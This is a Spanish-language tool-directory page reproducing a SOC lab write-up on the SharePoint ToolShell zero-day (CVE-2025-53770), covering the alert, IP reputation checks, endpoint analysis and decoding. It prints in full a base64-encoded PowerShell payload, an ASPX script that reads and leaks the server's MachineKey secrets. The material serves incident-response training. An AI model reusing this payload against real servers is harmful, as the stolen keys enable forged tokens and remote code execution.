Skip to content
KitploitKITPLOIT
HerramientasBlog
Log in
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
LetsDefend--SOC-342-CVE-2025-53770-SharePoint-Exploit-ToolShell — Recorrido detallado de la explotación del día cero CVE-2025-53770 (ToolShell) de SharePoint, incluido análisis de RCE, exfiltración de MachineKey, compilación de payload, despliegue de web shell y pasos de contención de respuesta a incidentes. | Kitploit
Herramientas/GitHubGitHub/michaael01/letsdefend--soc-342-cve-2025-53770-sharepoint-exploit-toolshell
Gestión de Indicadores de Compromiso (IOC)Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebAnálisis de MalwareForensia DigitalPruebas de PenetraciónInteligencia de Amenazas

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Aprendizaje y Educación
Respuesta a Incidentes
Labs y Práctica
GitHubmichaael01/letsdefend--soc-342-cve-2025-53770-sharepoint-exploit-toolshell

LetsDefend--SOC-342-CVE-2025-53770-SharePoint-Exploit-ToolShell

Recorrido detallado de la explotación del día cero CVE-2025-53770 (ToolShell) de SharePoint, incluido análisis de RCE, exfiltración de MachineKey, compilación de payload, despliegue de web shell y pasos de contención de respuesta a incidentes.

Ver Repositorio
14hace 1 añoAún no revisado
Compartir

LetsDefend--SOC-342-CVE-2025-53770-SharePoint-Exploit-ToolShell

Introducción

Investigué un zero-day de SharePoint llamado ToolShell (CVE-2025-53770) en el laboratorio de LetsDefend. Simulé un ataque zero-day del mundo real en el que una petición POST maliciosa omitió la autenticación, ejecutó PowerShell para robar las claves de MachineKeySection, compiló payload.exe e instaló un web shell (spinstall0.aspx). Registré todo, analicé el comportamiento y contuve el host. Este README cubre los procesos del ataque, los pasos para mitigarlo y las lecciones aprendidas.

Descripción General del Laboratorio

  • Plataforma: LetsDefend Cyber Range
  • Objetivo: SharePoint Server (SharePoint01)
  • CVE: CVE-2025-53770
  • Objetivo: Analizar el RCE, practicar la detección y la contención

Herramientas Utilizadas:

  • Windows PowerShell
  • VirusTotal
  • AbuseIPDB
  • LetsDefend Log Management
  • LetsDefend Enpoint Security
  • Base64 Decoder
  • LetsDefend Threat Intel

La Alerta

image

Esta es una alerta crítica y una actividad sospechosa que tuvo como objetivo el ToolPane.aspx de MS SharePoint con un payload grande y un Referer suplantado. El contexto de la CVE está vinculado a CVE-2025-53770. Es una vulnerabilidad crítica de SharePoint que se explota mediante una petición POST especialmente manipulada que permitía a atacantes no autenticados. La explotación exitosa condujo a la ejecución remota de código (RCE) en el servidor. Traté esto como activo y de alta urgencia, y asumí un posible compromiso exitoso hasta que se demuestre lo contrario.

Una Breve Explicación de SharePoint

Microsoft SharePoint es una plataforma de colaboración empresarial y gestión de documentos — esencialmente un centro seguro y organizado para archivos, flujos de trabajo y aplicaciones web internas.

Usos Principales

  • Gestión de documentos: Control de versiones, pistas de auditoría y permisos de archivos
  • Colaboración: Múltiples usuarios pueden coeditar y compartir documentos
  • Intranet / Portales: Noticias internas, políticas de RR. HH. y paneles
  • Flujos de trabajo y automatización: Formularios, aprobaciones y notificaciones
  • Integración: Se conecta con Teams, Outlook, aplicaciones de Office y Power BI

Consideraciones de Seguridad de SharePoint

  • Utiliza Active Directory o SSO para la autenticación
  • Datos cifrados en reposo y en tránsito
  • Las web parts y los diseños pueden ser abusados si se configuran incorrectamente
  • La aplicación regular de parches es fundamental para defenderse contra exploits zero-day

¿Qué es CVE-2025-53770 (ToolShell)?

Un zero-day crítico en Microsoft SharePoint Server que permite a los atacantes ejecutar código de forma remota sin autenticación. Abusa de la deserialización insegura y a menudo se encadena con otras fallas de SharePoint (CVE-2025-49704, CVE-2025-49706) para tomar el control total del sistema. Clasificado con CVSS 9.8 (Crítico) y explotado activamente en la naturaleza.

Análisis del Ataque con VirusTotal

Analicé la dirección IP del remitente (Dirección IP de origen) con VirusTotal Dirección IP de origen: 107.191.58.76 image

De esto puedo ver que 15/95 proveedores de seguridad marcaron esta dirección IP como maliciosa, lo que ya dice mucho sobre la IP.

Ubicación de la IP

Ahora tengo que buscar la ubicación de la IP. Esto se hizo con la ayuda de AbuseIPDB y, como se muestra a continuación, la IP es conocida por hacking, fuerza bruta, ataques a aplicaciones web, escaneo de puertos y envenenamiento de DNS.

image

Análisis del Endpoint

Como analista de SOC que resuelve esto, uno de los pasos importantes a seguir es el análisis del endpoint. Busqué el host en la seguridad de endpoints con el nombre 'SharePoint01' y, dado que la IP es conocida por hacking, para un análisis posterior.

image

después de localizar el host, revisé el historial de terminal para comprobar la línea de comandos

image

| Historial de Terminal Línea de comandos

PCVAIEltcG9ydCBOYW1lc3BhY2U9IlN5c3RlbS5EaWFnbm9zdGljcyIgJT4NCjwlQCBJbXBvcnQgTmFtZXNwYWNlPSJTeXN0ZW0uSU8iICU+DQo8c2NyaXB0IHJ1bmF0PSJzZXJ2ZXIiIGxhbmd1YWdlPSJjIyIgQ09ERVBBR0U9IjY1MDAxIj4NCiAgICBwdWJsaWMgdm9pZCBQYWdlX2xvYWQoKQ0KICAgIHsNCgkJdmFyIHN5ID0gU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHkuTG9hZCgiU3lzdGVtLldlYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWIwM2Y1ZjdmMTFkNTBhM2EiKTsNCiAgICAgICAgdmFyIG1rdCA9IHN5LkdldFR5cGUoIlN5c3RlbS5XZWIuQ29uZmlndXJhdGlvbi5NYWNoaW5lS2V5U2VjdGlvbiIpOw0KICAgICAgICB2YXIgZ2FjID0gbWt0LkdldE1ldGhvZCgiR2V0QXBwbGljYXRpb25Db25maWciLCBTeXN0ZW0uUmVmbGVjdGlvbi5CaW5kaW5nRmxhZ3MuU3RhdGljIHwgU3lzdGVtLlJlZmxlY3Rpb24uQmluZGluZ0ZsYWdzLk5vblB1YmxpYyk7DQogICAgICAgIHZhciBjZyA9IChTeXN0ZW0uV2ViLkNvbmZpZ3VyYXRpb24uTWFjaGluZUtleVNlY3Rpb24pZ2FjLkludm9rZShudWxsLCBuZXcgb2JqZWN0WzBdKTsNCiAgICAgICAgUmVzcG9uc2UuV3JpdGUoY2cuVmFsaWRhdGlvbktleSsifCIrY2cuVmFsaWRhdGlvbisifCIrY2cuRGVjcnlwdGlvbktleSsifCIrY2cuRGVjcnlwdGlvbisifCIrY2cuQ29tcGF0aWJpbGl0eU1vZGUpOw0KICAgIH0NCjwvc2NyaXB0Pg==

Banderas de PowerShell: -nop -w hidden -e

  • -nop = Sin perfil (evita los scripts de perfil).
  • -w hidden = iniciar la ventana oculta (sigilo).
  • -e = comando codificado

Hallazgos de la Línea de Comandos con Base64 Decoder:

Debido al payload, procedí a usar el Base64 decoder para decodificar el comando como se muestra a continuación

image

El usuario lanzó PowerShell desde el directorio del sistema “C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe” y con comandos codificados un script C# del lado del servidor ASP.NET.

  • Utiliza reflexión para cargar el ensamblado System.Web,
  • Accede al MachineKeySection no público y llama a un método no público (GetApplicationConfig),
  • Lee los valores de MachineKey de la aplicación web (ValidationKey, DecryptionKey, etc.),
  • Escribe esas claves en la respuesta HTTP (es decir, las exfiltra).

Captura de Payloads y Actividades Posteriores a la Explotación: / _layouts/15/ToolPane.aspx?...

El payload intenta leer y filtrar el MachineKey de ASP.NET del host, un secreto que se puede usar para forjar tokens de ViewState/deserialización y permitir la omisión de la autenticación y la ejecución remota de código. Esto coincide con el patrón de explotación de ToolShell (abuso de MachineKey. Indicadores clave de compromiso (IoCs) en el comando con el uso de Base64 Decode y Encode.

Descargar herramienta